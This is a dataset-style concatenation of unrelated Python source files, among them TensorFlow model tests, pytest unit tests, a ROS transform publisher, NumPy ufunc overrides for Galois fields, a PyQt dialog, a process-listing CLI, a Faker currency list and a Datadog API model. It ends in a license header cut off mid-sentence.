# Creates a FunnelTransformerEncoder with embedding_width != hidden_size
test_network = funnel_transformer.FunnelTransformerEncoder(
vocab_size=vocab_size,
hidden_size=hidden_size,
max_sequence_length=max_sequence_length,
num_attention_heads=2,
num_layers=3,
type_vocab_size=num_types,
embedding_width=16,
pool_stride=pool_stride)
dict_outputs = test_network([word_ids, mask, type_ids])
data = dict_outputs["sequence_output"]
pooled = dict_outputs["pooled_output"]
model = tf.keras.Model([word_ids, mask, type_ids], [data, pooled])
outputs = model.predict([word_id_data, mask_data, type_id_data])
self.assertEqual(outputs[0].shape[-1], hidden_size)
self.assertTrue(hasattr(test_network, "_embedding_projection"))
def test_serialize_deserialize(self):
# Create a network object that sets all of its config options.
kwargs = dict(
vocab_size=100,
hidden_size=32,
num_layers=3,
num_attention_heads=2,
max_sequence_length=21,
type_vocab_size=12,
inner_dim=1223,
inner_activation="relu",
output_dropout=0.05,
attention_dropout=0.22,
initializer="glorot_uniform",
output_range=-1,
embedding_width=16,
embedding_layer=None,
norm_first=False,
pool_type="max",
pool_stride=2,
unpool_length=0,
transformer_cls="TransformerEncoderBlock")
network = funnel_transformer.FunnelTransformerEncoder(**kwargs)
expected_config = dict(kwargs)
expected_config["inner_activation"] = tf.keras.activations.serialize(
tf.keras.activations.get(expected_config["inner_activation"]))
expected_config["initializer"] = tf.keras.initializers.serialize(
tf.keras.initializers.get(expected_config["initializer"]))
self.assertEqual(network.get_config(), expected_config)
# Create another network object from the first object's config.
new_network = funnel_transformer.FunnelTransformerEncoder.from_config(
network.get_config())
# If the serialization was successful, the new config should match the old.
self.assertAllEqual(network.get_config(), new_network.get_config())
# Tests model saving/loading.
model_path = self.get_temp_dir() + "/model"
network_wrapper = SingleLayerModel(network)
# One forward-path to ensure input_shape.
batch_size = 3
sequence_length = 21
vocab_size = 100
num_types = 12
word_id_data = np.random.randint(
vocab_size, size=(batch_size, sequence_length))
mask_data = np.random.randint(2, size=(batch_size, sequence_length))
type_id_data = np.random.randint(
num_types, size=(batch_size, sequence_length))
_ = network_wrapper.predict([word_id_data, mask_data, type_id_data])
network_wrapper.save(model_path)
_ = tf.keras.models.load_model(model_path)
if __name__ == "__main__":
tf.test.main()
|
StarcoderdataPython
|
6496594
|
<gh_stars>1-10
import os
import pytest
from app.movie import format_movie_year_min
from app.movie import format_vote_average
from app.movie import format_runtime_min
from app.movie import format_runtime_max
from app.movie import format_movie_certification
from app.movie import genre_string_to_id
from app.movie import run_API
from app.movie import format_vote_average
CI_ENV = os.getenv("CI") == "false"
def test_movie_year_min():
assert format_movie_year_min("1990") == "1990-01-01"
assert format_movie_year_min("") == None
def test_vote_average():
assert format_vote_average("7.2") == 7.2
assert format_vote_average("") == None
with pytest.raises(ValueError) as ERROR:
format_vote_average("seventy")
def test_runtime_min():
assert format_runtime_min("100") == 100
assert format_runtime_min("") == None
with pytest.raises(ValueError) as ERROR:
format_runtime_min("one-hundred")
def test_runtime_max():
assert format_runtime_max("100") == 100
assert format_runtime_max("") == None
with pytest.raises(ValueError) as ERROR:
format_runtime_max("one-hundred")
def test_movie_certification():
assert format_movie_certification("PG") == "PG"
assert format_movie_certification("") == None
def test_genre_string_to_id():
assert genre_string_to_id("Animation") == "16"
assert genre_string_to_id("") == None
CI_ENV = os.getenv("CI") == "true"
@pytest.mark.skipif(CI_ENV==True, reason="to avoid issuing HTTP requests on the CI server") # skips this test on CI
def test_run_API():
assert run_API("two-thousand", None, None, None, None, None, None, None) == None
|
StarcoderdataPython
|
1977048
|
#! /usr/bin/env python
import geometry_msgs.msg
import rospy
import tf2_ros
if __name__ == '__main__':
"""
Broadcast a transform from parent_frame to target_frame forever,
with changing translation.
"""
rospy.init_node('dummy_transform_publisher', anonymous=True)
br = tf2_ros.TransformBroadcaster()
current_transform = geometry_msgs.msg.TransformStamped()
current_transform.header.frame_id = rospy.get_param('~parent_frame')
current_transform.child_frame_id = rospy.get_param('~child_frame')
# Ensure rotation quaternion is well-formed
current_transform.transform.rotation.w = 1.0
osc_rate_hz = rospy.get_param('~osc_rate')
update_rate_hz = rospy.get_param('~update_rate')
# we oscillate between 0 and 1, so this is our step size
# for osc_rate = 1Hz, update_rate = 60Hz -> 1/60
step_size = (1.0 * osc_rate_hz) / update_rate_hz
update_rate = rospy.Rate(update_rate_hz)
counting_up = True
while not rospy.is_shutdown():
current_transform.header.stamp = rospy.Time.now()
if counting_up:
current_transform.transform.translation.x += step_size
if current_transform.transform.translation.x >= 1.0:
counting_up = False
else:
current_transform.transform.translation.x -= step_size
if current_transform.transform.translation.x <= 0.0:
counting_up = True
br.sendTransform(current_transform)
update_rate.sleep()
|
StarcoderdataPython
|
8195012
|
<filename>Number_LetterToHexAndBin.py
import time
while True:
user_input = input("Enter a letter: ")
letter_as_num = ord(user_input)
time.sleep(1)
print("Decimal: {:d}".format(letter_as_num))
print("Hexadecimal: {:02x}".format(letter_as_num))
time.sleep(0.76)
print("************************************")
time.sleep(1)
|
StarcoderdataPython
|
5074938
|
<filename>back/simulador/__init__.py
from .event import *
from .model import *
from .process import *
from .simulation import *
from .simulator import *
|
StarcoderdataPython
|
9780533
|
"""
A module that contains a metaclass mixin that provides NumPy ufunc overriding for an ndarray subclass.
"""
import numpy as np
from ._calculate import CalculateMeta
from ._lookup import LookupMeta
class UfuncMeta(LookupMeta, CalculateMeta):
"""
A mixin class that provides the basics for compiling ufuncs.
"""
# pylint: disable=no-value-for-parameter,abstract-method
_UNSUPPORTED_UFUNCS_UNARY = [
np.invert,
np.log2, np.log10,
np.exp, np.expm1, np.exp2,
np.sin, np.cos, np.tan,
np.sinh, np.cosh, np.tanh,
np.arcsin, np.arccos, np.arctan,
np.arcsinh, np.arccosh, np.arctanh,
np.degrees, np.radians,
np.deg2rad, np.rad2deg,
np.floor, np.ceil, np.trunc, np.rint,
]
_UNSUPPORTED_UFUNCS_BINARY = [
np.hypot, np.arctan2,
np.logaddexp, np.logaddexp2,
np.fmod, np.modf,
np.fmin, np.fmax,
]
_UNSUPPORTED_UFUNCS = _UNSUPPORTED_UFUNCS_UNARY + _UNSUPPORTED_UFUNCS_BINARY
_UFUNCS_REQUIRING_VIEW = [
np.bitwise_and, np.bitwise_or, np.bitwise_xor,
np.left_shift, np.right_shift,
np.positive,
]
_OVERRIDDEN_UFUNCS = {
np.add: "_ufunc_routine_add",
np.negative: "_ufunc_routine_negative",
np.subtract: "_ufunc_routine_subtract",
np.multiply: "_ufunc_routine_multiply",
np.reciprocal: "_ufunc_routine_reciprocal",
np.floor_divide: "_ufunc_routine_divide",
np.true_divide: "_ufunc_routine_divide",
np.divmod: "_ufunc_routine_divmod",
np.remainder: "_ufunc_routine_remainder",
np.power: "_ufunc_routine_power",
np.square: "_ufunc_routine_square",
np.log: "_ufunc_routine_log",
np.sqrt: "_ufunc_routine_sqrt",
np.matmul: "_ufunc_routine_matmul",
}
def __init__(cls, name, bases, namespace, **kwargs):
super().__init__(name, bases, namespace, **kwargs)
cls._ufuncs = {}
def _compile_ufuncs(cls):
"""
Compile/re-compile the ufuncs based on the `ufunc_mode`. This may be supplemented in GF2Meta, GF2mMeta, GFpMeta, and GFpmMeta.
"""
cls._ufuncs = {} # Reset the dictionary so each ufunc will get recompiled
if cls.ufunc_mode == "jit-lookup":
cls._build_lookup_tables()
def _ufunc(cls, name):
"""
Returns the ufunc for the specific type of arithmetic. The ufunc compilation is based on `ufunc_mode`.
"""
if name not in cls._ufuncs:
if cls.ufunc_mode == "jit-lookup":
cls._ufuncs[name] = cls._ufunc_lookup(name)
elif cls.ufunc_mode == "jit-calculate":
cls._ufuncs[name] = cls._ufunc_calculate(name)
else:
cls._ufuncs[name] = cls._ufunc_python(name)
return cls._ufuncs[name]
###############################################################################
# Ufuncs written in NumPy operations (not JIT compiled)
###############################################################################
@staticmethod
def _sqrt(a):
raise NotImplementedError
###############################################################################
# Input/output conversion functions
###############################################################################
def _verify_unary_method_not_reduction(cls, ufunc, method): # pylint: disable=no-self-use
if method in ["reduce", "accumulate", "reduceat", "outer"]:
raise ValueError(f"Ufunc method {method!r} is not supported on {ufunc.__name__!r}. Reduction methods are only supported on binary functions.")
def _verify_binary_method_not_reduction(cls, ufunc, method): # pylint: disable=no-self-use
if method in ["reduce", "accumulate", "reduceat"]:
raise ValueError(f"Ufunc method {method!r} is not supported on {ufunc.__name__!r} because it takes inputs with type {cls.name} array and integer array. Different types do not support reduction.")
def _verify_method_only_call(cls, ufunc, method): # pylint: disable=no-self-use
if not method == "__call__":
raise ValueError(f"Ufunc method {method!r} is not supported on {ufunc.__name__!r}. Only '__call__' is supported.")
def _verify_operands_in_same_field(cls, ufunc, inputs, meta): # pylint: disable=no-self-use
if len(meta["non_field_operands"]) > 0:
raise TypeError(f"Operation {ufunc.__name__!r} requires both operands to be {cls.name} arrays, not {[inputs[i] for i in meta['operands']]}.")
def _verify_operands_in_field_or_int(cls, ufunc, inputs, meta): # pylint: disable=no-self-use
for i in meta["non_field_operands"]:
if isinstance(inputs[i], (int, np.integer)):
pass
elif isinstance(inputs[i], np.ndarray):
if meta["field"].dtypes == [np.object_]:
if not (inputs[i].dtype == np.object_ or np.issubdtype(inputs[i].dtype, np.integer)):
raise ValueError(f"Operation {ufunc.__name__!r} requires operands with type np.ndarray to have integer dtype, not {inputs[i].dtype}.")
else:
if not np.issubdtype(inputs[i].dtype, np.integer):
raise ValueError(f"Operation {ufunc.__name__!r} requires operands with type np.ndarray to have integer dtype, not {inputs[i].dtype}.")
else:
raise TypeError(f"Operation {ufunc.__name__!r} requires operands that are not {cls.name} arrays to be integers or an integer np.ndarray, not {type(inputs[i])}.")
def _verify_operands_first_field_second_int(cls, ufunc, inputs, meta): # pylint: disable=no-self-use
if len(meta["operands"]) == 1:
return
if not meta["operands"][0] == meta["field_operands"][0]:
raise TypeError(f"Operation {ufunc.__name__!r} requires the first operand to be a {cls.name} array, not {meta['types'][meta['operands'][0]]}.")
if len(meta["field_operands"]) > 1 and meta["operands"][1] == meta["field_operands"][1]:
raise TypeError(f"Operation {ufunc.__name__!r} requires the second operand to be an integer array, not {meta['types'][meta['operands'][1]]}.")
second = inputs[meta["operands"][1]]
if isinstance(second, (int, np.integer)):
return
# elif type(second) is np.ndarray:
# if not np.issubdtype(second.dtype, np.integer):
# raise ValueError(f"Operation {ufunc.__name__!r} requires the second operand with type np.ndarray to have integer dtype, not {second.dtype}.")
elif isinstance(second, np.ndarray):
if meta["field"].dtypes == [np.object_]:
if not (second.dtype == np.object_ or np.issubdtype(second.dtype, np.integer)):
raise ValueError(f"Operation {ufunc.__name__!r} requires operands with type np.ndarray to have integer dtype, not {second.dtype}.")
else:
if not np.issubdtype(second.dtype, np.integer):
raise ValueError(f"Operation {ufunc.__name__!r} requires operands with type np.ndarray to have integer dtype, not {second.dtype}.")
else:
raise TypeError(f"Operation {ufunc.__name__!r} requires the second operand to be an integer or integer np.ndarray, not {type(second)}.")
def _view_inputs_as_ndarray(cls, inputs, kwargs, dtype=None): # pylint: disable=no-self-use
# View all inputs that are Galois field arrays as np.ndarray to avoid infinite recursion
v_inputs = list(inputs)
for i in range(len(inputs)):
if issubclass(type(inputs[i]), cls):
v_inputs[i] = inputs[i].view(np.ndarray) if dtype is None else inputs[i].view(np.ndarray).astype(dtype)
# View all output arrays as np.ndarray to avoid infinite recursion
if "out" in kwargs:
outputs = kwargs["out"]
v_outputs = []
for output in outputs:
if issubclass(type(output), cls):
o = output.view(np.ndarray) if dtype is None else output.view(np.ndarray).astype(dtype)
else:
o = output
v_outputs.append(o)
kwargs["out"] = tuple(v_outputs)
return v_inputs, kwargs
def _view_output_as_field(cls, output, field, dtype): # pylint: disable=no-self-use
if isinstance(type(output), field):
return output
elif isinstance(output, np.ndarray):
return output.astype(dtype).view(field)
elif output is None:
return None
else:
return field(output, dtype=dtype)
###############################################################################
# Ufunc routines
###############################################################################
def _ufunc_routine_add(cls, ufunc, method, inputs, kwargs, meta):
cls._verify_operands_in_same_field(ufunc, inputs, meta)
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
output = getattr(cls._ufunc("add"), method)(*inputs, **kwargs)
output = cls._view_output_as_field(output, meta["field"], meta["dtype"])
return output
def _ufunc_routine_negative(cls, ufunc, method, inputs, kwargs, meta): # pylint: disable=unused-argument
cls._verify_unary_method_not_reduction(ufunc, method)
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
output = getattr(cls._ufunc("negative"), method)(*inputs, **kwargs)
output = cls._view_output_as_field(output, meta["field"], meta["dtype"])
return output
def _ufunc_routine_subtract(cls, ufunc, method, inputs, kwargs, meta):
cls._verify_operands_in_same_field(ufunc, inputs, meta)
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
output = getattr(cls._ufunc("subtract"), method)(*inputs, **kwargs)
output = cls._view_output_as_field(output, meta["field"], meta["dtype"])
return output
def _ufunc_routine_multiply(cls, ufunc, method, inputs, kwargs, meta):
if len(meta["non_field_operands"]) > 0:
# Scalar multiplication
cls._verify_operands_in_field_or_int(ufunc, inputs, meta)
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
inputs[meta["non_field_operands"][0]] = np.mod(inputs[meta["non_field_operands"][0]], cls.characteristic)
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
output = getattr(cls._ufunc("multiply"), method)(*inputs, **kwargs)
output = cls._view_output_as_field(output, meta["field"], meta["dtype"])
return output
def _ufunc_routine_reciprocal(cls, ufunc, method, inputs, kwargs, meta): # pylint: disable=unused-argument
cls._verify_unary_method_not_reduction(ufunc, method)
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
output = getattr(cls._ufunc("reciprocal"), method)(*inputs, **kwargs)
output = cls._view_output_as_field(output, meta["field"], meta["dtype"])
return output
def _ufunc_routine_divide(cls, ufunc, method, inputs, kwargs, meta):
cls._verify_operands_in_same_field(ufunc, inputs, meta)
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
output = getattr(cls._ufunc("divide"), method)(*inputs, **kwargs)
output = cls._view_output_as_field(output, meta["field"], meta["dtype"])
return output
def _ufunc_routine_divmod(cls, ufunc, method, inputs, kwargs, meta):
q = cls._ufunc_routine_divide(ufunc, method, inputs, kwargs, meta)
r = cls.Zeros(q.shape)
output = q, r
return output
def _ufunc_routine_remainder(cls, ufunc, method, inputs, kwargs, meta):
# Perform dummy addition operation to get shape of output zeros
x = cls._ufunc_routine_add(ufunc, method, inputs, kwargs, meta)
output = cls.Zeros(x.shape)
return output
def _ufunc_routine_power(cls, ufunc, method, inputs, kwargs, meta):
cls._verify_binary_method_not_reduction(ufunc, method)
cls._verify_operands_first_field_second_int(ufunc, inputs, meta)
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
output = getattr(cls._ufunc("power"), method)(*inputs, **kwargs)
output = cls._view_output_as_field(output, meta["field"], meta["dtype"])
return output
def _ufunc_routine_square(cls, ufunc, method, inputs, kwargs, meta): # pylint: disable=unused-argument
cls._verify_unary_method_not_reduction(ufunc, method)
inputs = list(inputs) + [2]
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
output = getattr(cls._ufunc("power"), method)(*inputs, **kwargs)
output = cls._view_output_as_field(output, meta["field"], meta["dtype"])
return output
def _ufunc_routine_log(cls, ufunc, method, inputs, kwargs, meta): # pylint: disable=unused-argument
cls._verify_method_only_call(ufunc, method)
inputs = list(inputs) + [int(cls.primitive_element)]
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
output = getattr(cls._ufunc("log"), method)(*inputs, **kwargs)
return output
def _ufunc_routine_sqrt(cls, ufunc, method, inputs, kwargs, meta): # pylint: disable=unused-argument
cls._verify_method_only_call(ufunc, method)
x = inputs[0]
b = x.is_quadratic_residue() # Boolean indicating if the inputs are quadratic residues
if not np.all(b):
raise ArithmeticError(f"Input array has elements that are quadratic non-residues (do not have a square root). Use `x.is_quadratic_residue()` to determine if elements have square roots in {cls.name}.\n{x[~b]}")
return cls._sqrt(*inputs)
def _ufunc_routine_matmul(cls, ufunc, method, inputs, kwargs, meta): # pylint: disable=unused-argument
cls._verify_method_only_call(ufunc, method)
return cls._matmul(*inputs, **kwargs)
|
StarcoderdataPython
|
25028
|
<reponame>VagnerGit/PythonCursoEmVideo<filename>desafio_005_antecessor_e_sucessor.py
"""
Exercício Python 5:
Faça um programa que leia um número Inteiro e
mostre na tela o seu sucessor e seu antecessor.
"""
n = int(input('digite um numero inteiro '))
#ant = n-1
#post = n+1
#print('O antecessor de {} é {} e posterior é {}' .format(n, ant, post))
print('{} o antercessor é {} o sucessor é {}'.format(n, (n-1), (n+1)))
|
StarcoderdataPython
|
9658600
|
# This file was auto generated; Do not modify, if you value your sanity!
import ctypes
import enum
from ics.structures.s_phy_reg_pkt_clause22_mess import *
from ics.structures.s_phy_reg_pkt_clause45_mess import *
class Nameless9872(ctypes.Structure):
_fields_ = [
('Enabled', ctypes.c_uint16, 1),
('WriteEnable', ctypes.c_uint16, 1),
('Clause45Enable', ctypes.c_uint16, 1),
('status', ctypes.c_uint16, 2),
('reserved', ctypes.c_uint16, 3),
('BusIndex', ctypes.c_uint16, 4),
('version', ctypes.c_uint16, 4),
]
class Nameless28192(ctypes.Union):
_anonymous_ = ('Nameless9872',)
_fields_ = [
('Nameless9872', Nameless9872),
('flags', ctypes.c_uint16),
]
class Nameless18906(ctypes.Union):
_fields_ = [
('clause22', PhyRegPktClause22Mess_t),
('clause45', PhyRegPktClause45Mess_t),
]
class s_phy_reg_pkt(ctypes.Structure):
_anonymous_ = ('Nameless28192', 'Nameless18906')
_fields_ = [
('Nameless28192', Nameless28192),
('Nameless18906', Nameless18906),
]
SPhyRegPkt = s_phy_reg_pkt
PhyRegPkt_t = s_phy_reg_pkt
|
StarcoderdataPython
|
1942577
|
<gh_stars>0
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'dialog_Radius.ui'
#
# Created by: PyQt5 UI code generator 5.14.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog_Radius(object):
def setupUi(self, Dialog_Radius):
Dialog_Radius.setObjectName("Dialog_Radius")
Dialog_Radius.resize(415, 310)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog_Radius)
self.buttonBox.setGeometry(QtCore.QRect(30, 240, 341, 32))
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.frame = QtWidgets.QFrame(Dialog_Radius)
self.frame.setGeometry(QtCore.QRect(40, 50, 351, 131))
self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setObjectName("frame")
self.label_radius = QtWidgets.QLabel(self.frame)
self.label_radius.setGeometry(QtCore.QRect(100, 20, 161, 20))
font = QtGui.QFont()
font.setPointSize(13)
self.label_radius.setFont(font)
self.label_radius.setObjectName("label_radius")
self.horizontalSlider_radius = QtWidgets.QSlider(self.frame)
self.horizontalSlider_radius.setGeometry(QtCore.QRect(10, 50, 331, 22))
self.horizontalSlider_radius.setMaximum(250)
self.horizontalSlider_radius.setOrientation(QtCore.Qt.Horizontal)
self.horizontalSlider_radius.setObjectName("horizontalSlider_radius")
self.labe_radius_value = QtWidgets.QLabel(self.frame)
self.labe_radius_value.setGeometry(QtCore.QRect(20, 80, 81, 20))
self.labe_radius_value.setObjectName("labe_radius_value")
self.retranslateUi(Dialog_Radius)
self.buttonBox.accepted.connect(Dialog_Radius.accept)
self.buttonBox.rejected.connect(Dialog_Radius.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog_Radius)
def retranslateUi(self, Dialog_Radius):
_translate = QtCore.QCoreApplication.translate
Dialog_Radius.setWindowTitle(_translate("Dialog_Radius", "Dialog"))
self.label_radius.setText(_translate("Dialog_Radius", "Radius of circle"))
self.labe_radius_value.setText(_translate("Dialog_Radius", "Radius value "))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Dialog_Radius = QtWidgets.QDialog()
ui = Ui_Dialog_Radius()
ui.setupUi(Dialog_Radius)
Dialog_Radius.show()
sys.exit(app.exec_())
|
StarcoderdataPython
|
1666602
|
<gh_stars>1-10
from hodgepodge.click import str_to_ints, str_to_strs
import click
import hodgepodge.processes
@click.group()
def processes():
"""
Query processes.
"""
@processes.command()
@click.option('--pids')
@click.option('--ppids')
@click.option('--names')
@click.option('--hide-empty-values/--show-empty-values', 'remove_empty_values')
def get_processes(pids: str, ppids: str, names: str, remove_empty_values: bool):
for process in hodgepodge.processes.iter_processes(
pids=str_to_ints(pids),
ppids=str_to_ints(ppids),
names=str_to_strs(names),
):
click.echo(process.to_json(remove_empty_values=remove_empty_values))
|
StarcoderdataPython
|
9608033
|
<reponame>StabbarN/faker<filename>faker/providers/currency/es_ES/__init__.py<gh_stars>10-100
from .. import Provider as CurrencyProvider
class Provider(CurrencyProvider):
# Format: (code, name)
currencies = (
("AED", "Dírham de los Emiratos Árabes Unidos"),
("AFN", "Afghaní"),
("ALL", "Lek albanés"),
("AMD", "Dram armenio"),
("ANG", "Florín de las Antillas Holandesas"),
("AOA", "Kwanza angoleño"),
("ARS", "Peso argentino"),
("AUD", "Dólar australiano"),
("AWG", "Florín arubeño"),
("AZN", "Manat azerbaiyano"),
("BAM", "Marco bosnioherzegovino"),
("BBD", "Dólar barbadense"),
("BDT", "Taka bangladesí"),
("BGN", "Lev búlgaro"),
("BHD", "Dinar bahreiní"),
("BIF", "Franco burundés"),
("BMD", "Dólar de Bermudas"),
("BND", "Dólar bruneano"),
("BOB", "Boliviano"),
("BRL", "Real brasileño"),
("BSD", "Dólar bahameño"),
("BTN", "Ngultrum butanés"),
("BWP", "Pula de Botswana"),
("BYR", "Rublio bielurruso"),
("BZD", "Dólar beliceño"),
("CAD", "Dólar canadiense"),
("CDF", "Franco congolés"),
("CHF", "Franco suizo"),
("CLP", "Peso chileno"),
("CNY", "Yuan"),
("COP", "Peso colombiano"),
("CRC", "Colón costarricense"),
("CUC", "Peso cubano convertible"),
("CUP", "Peso subano"),
("CVE", "Escudo de Cabo Verde"),
("CZK", "Corona checa"),
("DJF", "Franco yibutiano"),
("DKK", "Corona danesa"),
("DOP", "Peso dominicano"),
("DZD", "Dinar argelino"),
("EGP", "Libra egipcia"),
("ERN", "Nafka"),
("ETB", "Bir de Etiopía"),
("EUR", "Euro"),
("FJD", "Dólar fiyiano"),
("FKP", "Libra de las islas Falkland"),
("GBP", "Libra esterlina"),
("GEL", "Larí georgiano"),
("GGP", "Libra de Guernsey"),
("GHS", "Cedi"),
("GIP", "Libra de Gibraltar"),
("GMD", "Dalasi"),
("GNF", "Franco guineano"),
("GTQ", "Quetzal guatemalteco"),
("GYD", "Dólar guyanés"),
("HKD", "Dólar hongkonés"),
("HNL", "Lempira hondureño"),
("HRK", "Kuna croata"),
("HTG", "Gourde haitiano"),
("HUF", "Forinto húngaro"),
("IDR", "Rupia indonesia"),
("ILS", "Séquel israelí"),
("NIS", "Nuevo Séquel israelí"),
("IMP", "Libra manesa"),
("INR", "Rupia india"),
("IQD", "<NAME>"),
("IRR", "Rial iraní"),
("ISK", "Corona islandesa"),
("JEP", "Libra de Jersey"),
("JMD", "Dólar jamaicano"),
("JOD", "Dinar jordano"),
("JPY", "Yen japonés"),
("KES", "<NAME>"),
("KGS", "Som kirguís"),
("KHR", "<NAME>"),
("KMF", "Franco comorense"),
("KPW", "Won norcoreano"),
("KRW", "Krahn Occidental"),
("KWD", "Dinar kuwaití"),
("KYD", "D<NAME>"),
("KZT", "<NAME>"),
("LAK", "<NAME>"),
("LBP", "Libra libanesa"),
("LKR", "Rupia esrilanquesa"),
("LRD", "<NAME>"),
("LSL", "<NAME>"),
("LTL", "Litas lituana"),
("LYD", "<NAME>"),
("MAD", "<NAME>"),
("MDL", "<NAME>"),
("MGA", "<NAME>"),
("MKD", "<NAME>"),
("MMK", "<NAME>"),
("MNT", "<NAME>"),
("MOP", "<NAME>"),
("MRO", "<NAME>"),
("MUR", "R<NAME>"),
("MVR", "Rupia de Maldivas"),
("MWK", "<NAME>"),
("MXN", "Peso mexicano"),
("MYR", "Ringgit"),
("MZN", "Metical mozambiqueño"),
("NAD", "<NAME>"),
("NGN", "Naira nigeriano"),
("NIO", "Córdoba nicaragüense"),
("NOK", "Corona noruega"),
("NPR", "Rupia nepalí"),
("NZD", "<NAME>"),
("OMR", "R<NAME>"),
("PAB", "Balboa panameño"),
("PEN", "Sol peruano"),
("PGK", "Kina"),
("PHP", "Peso filipino"),
("PKR", "Rupia pakistaní"),
("PLN", "Złoty polaco"),
("PYG", "Guaraní paraguayo"),
("QAR", "Riyal catarí"),
("RON", "<NAME>"),
("RSD", "<NAME>"),
("RUB", "Rublo ruso"),
("RWF", "Franco ruandés"),
("SAR", "Riyal saudí"),
("SBD", "Dólar de las islas Solomon"),
("SCR", "Rupia seychellense"),
("SDG", "Libra sudanesa"),
("SEK", "Corona sueca"),
("SGD", "Dólar de Singapur"),
("SHP", "Libra de Santa Elena"),
("SLL", "Leona"),
("SOS", "Chelín somalí"),
("SPL", "Luigino"),
("SRD", "Dólar surinamés"),
("STD", "Dobra santotomense"),
("SVC", "Colón salvadoreño"),
("SYP", "Libra siria"),
("SZL", "Lilangeni"),
("THB", "Baht tailandés"),
("TJS", "Somoni tayiko"),
("TMT", "Manat turcomano"),
("TND", "Dinar tunecino"),
("TOP", "Pa'anga tongano"),
("TRY", "Lira turca"),
("TTD", "Dólar de Trinidad and Tobago"),
("TVD", "Dólar tuvaluano"),
("TWD", "Nuevo dólar taiwanés"),
("TZS", "Chelín tanzano"),
("UAH", "Grivna ucraniano"),
("UGX", "Chelín ugandés"),
("USD", "Dólar de Estados Unidos"),
("UYU", "Peso uruguayo"),
("UZS", "Soʻm Uzbekistani"),
("VEF", "Bolívar venezolano"),
("VND", "Đồng vietnamita"),
("VUV", "Vanuatu vatu"),
("WST", "Tālā samoano"),
("XAF", "Franco centro africano"),
("XCD", "Dólar del Caribe Oriental"),
("XDR", "Derechos especiales de giro"),
("XOF", "Franco de África occidental"),
("XPF", "Franco CFP"),
("YER", "Rial yemení"),
("ZAR", "<NAME>"),
("ZMW", "<NAME>"),
("ZWD", "<NAME>"),
)
|
StarcoderdataPython
|
8151329
|
from torch.nn import L1Loss
from hyperverlet.loss import TimeDecayMSELoss, MeanNormLoss
def construct_loss(train_args):
criterion = train_args['criterion']
if criterion == 'TimeDecayMSELoss':
time_decay = train_args["time_decay"]
return TimeDecayMSELoss(time_decay)
else:
losses = {
'MeanNormLoss': MeanNormLoss,
'L1Loss': L1Loss
}
return losses[criterion]()
|
StarcoderdataPython
|
6632004
|
<reponame>Valisback/hiring-engineers<gh_stars>0
# Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
from datadog_api_client.v1.model_utils import (
ModelNormal,
cached_property,
)
def lazy_import():
from datadog_api_client.v1.model.group_widget_definition_type import GroupWidgetDefinitionType
from datadog_api_client.v1.model.widget import Widget
from datadog_api_client.v1.model.widget_layout_type import WidgetLayoutType
from datadog_api_client.v1.model.widget_text_align import WidgetTextAlign
globals()["GroupWidgetDefinitionType"] = GroupWidgetDefinitionType
globals()["Widget"] = Widget
globals()["WidgetLayoutType"] = WidgetLayoutType
globals()["WidgetTextAlign"] = WidgetTextAlign
class GroupWidgetDefinition(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
validations = {}
@cached_property
def openapi_types():
lazy_import()
return {
"background_color": (str,),
"banner_img": (str,),
"layout_type": (WidgetLayoutType,),
"show_title": (bool,),
"title": (str,),
"title_align": (WidgetTextAlign,),
"type": (GroupWidgetDefinitionType,),
"widgets": ([Widget],),
}
attribute_map = {
"layout_type": "layout_type",
"type": "type",
"widgets": "widgets",
"background_color": "background_color",
"banner_img": "banner_img",
"show_title": "show_title",
"title": "title",
"title_align": "title_align",
}
read_only_vars = {}
def __init__(self, layout_type, type, widgets, *args, **kwargs):
"""GroupWidgetDefinition - a model defined in OpenAPI
Args:
layout_type (WidgetLayoutType):
type (GroupWidgetDefinitionType):
widgets ([Widget]): List of widget groups.
Keyword Args:
background_color (str): [optional] Background color of the group title.
banner_img (str): [optional] URL of image to display as a banner for the group.
show_title (bool): [optional] Whether to show the title or not. If omitted the server will use the default value of True.
title (str): [optional] Title of the widget.
title_align (WidgetTextAlign): [optional]
"""
super().__init__(kwargs)
self._check_pos_args(args)
self.layout_type = layout_type
self.type = type
self.widgets = widgets
@classmethod
def _from_openapi_data(cls, layout_type, type, widgets, *args, **kwargs):
"""Helper creating a new instance from a response."""
self = super(GroupWidgetDefinition, cls)._from_openapi_data(kwargs)
self._check_pos_args(args)
self.layout_type = layout_type
self.type = type
self.widgets = widgets
return self
|
StarcoderdataPython
|
9666753
|
<filename>src/utils.py<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (C) 2020, <NAME> <<EMAIL>>
# All rights reserved
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
